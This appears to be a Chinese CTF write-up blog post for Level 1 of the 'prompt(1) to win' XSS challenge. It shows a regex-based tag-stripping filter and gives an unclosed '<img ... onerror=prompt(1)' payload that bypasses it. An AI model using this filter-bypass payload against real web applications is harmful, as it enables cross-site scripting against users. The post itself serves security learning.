加载中...

【prompt(1) to win】 Level 1 - tags stripping

CTF

原创

发布日期: 2020-07-04

更新日期: 2024-11-17

文章字数: 178

阅读时长: 1 分

阅读次数:

来源：prompt(1) to win
题目：Level 1 - tags stripping

题目

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

解题思路

注意观察正则表达式，它会把所有匹配 <tag> 或 </tag> 的标签全部剥离。

那么不构造完整的 tag 、仅通过属性注入就可以绕过了，如这样的 payload ：

<img src=0 onerror=prompt(1) （注意末尾有一个空格）

答案下载

payload.html : 下载

EXP

https://exp-blog.com/safe/ctf/prompt/level-1-tags-stripping/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !

解题报告 CTF prompt(1) to win

【prompt(1) to win】 Level 2 - frowny face

2020-07-10 CTF

解题报告 CTF prompt(1) to win

【prompt(1) to win】 Level 0 - warm up

2020-07-03 CTF

解题报告 CTF prompt(1) to win

【prompt(1) to win】 Level 1 - tags stripping

题目

解题思路

答案下载

你的赏识是我前进的动力